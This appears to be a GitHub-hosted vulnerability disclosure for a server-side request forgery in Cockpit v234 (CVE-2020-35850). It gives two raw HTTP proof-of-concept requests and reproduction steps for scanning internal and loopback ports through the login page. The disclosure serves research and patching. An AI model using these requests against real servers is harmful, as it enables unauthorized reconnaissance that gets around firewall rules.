Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Cockpit-Project v234 - Server-Side Request Vulnerability (unauthenticated) CVE-2020-35850

  • Cockpit version: 234
  • OS: Ubuntu 18.04
  • Page: login

User can detect open ssh port or another open ports on server that services Cockpit last version. This is a vulnerability that allows an user send request to internal hosts for detecting open ports. So that firewall configuration can be bypassed or the server can be used like gateway by malicious user for scanning process. In addition, user induces the application to make an request back to the server that is hosting Cockpit. For example: if system admin creates iptables rule to drop all packets that come to 22 port or another port, user can detect whether port 22 is open or not.

Assuming that there is a iptables rule which port 22 is open for 127.0.0.1 (loopback interface) but is closed for other interfaces.

First HTTP Request:

GET /cockpit+=192.168.1.27:22/login HTTP/1.1
Host: 192.168.1.27:9090
User-Agent: *
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic dWJ1bnR1OnVidW50dQ==
X-Authorize:
Connection: close
Cookie: cockpit=deleted
Second HTTP Request:

GET /cockpit+=127.0.0.1:22/login HTTP/1.1
Host: 192.168.1.27:9090
User-Agent: *
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic dWJ1bnR1OnVidW50dQ==
X-Authorize:
Connection: close
Cookie: cockpit=deleted

alt text

Steps to reproduce:

On login panel,

  1. Click Other Options.
  2. Set 127.0.0.1 to Connect to field and send request with incorrect credentials.
  3. Intercept the request with Burp Suite
  4. If ssh service is open on port 22 and credentials are wrong, server returns "401 Authentication Failed" response.
  5. If user tries connect to a port that accepts data for ssh connection , server returns "401 Authentication failed: no-host" response and waits 10 seconds.
  6. If user tries connect to a closed port , server returns "401 Authentication failed: no-host" response without waiting.
  7. If ssh service is open on port 22 and credentials are correct, server returns "200" response.
  8. You can detect open ports on internal server or loopback interface of target server by changing remote port number.

alt text

alt text

alt text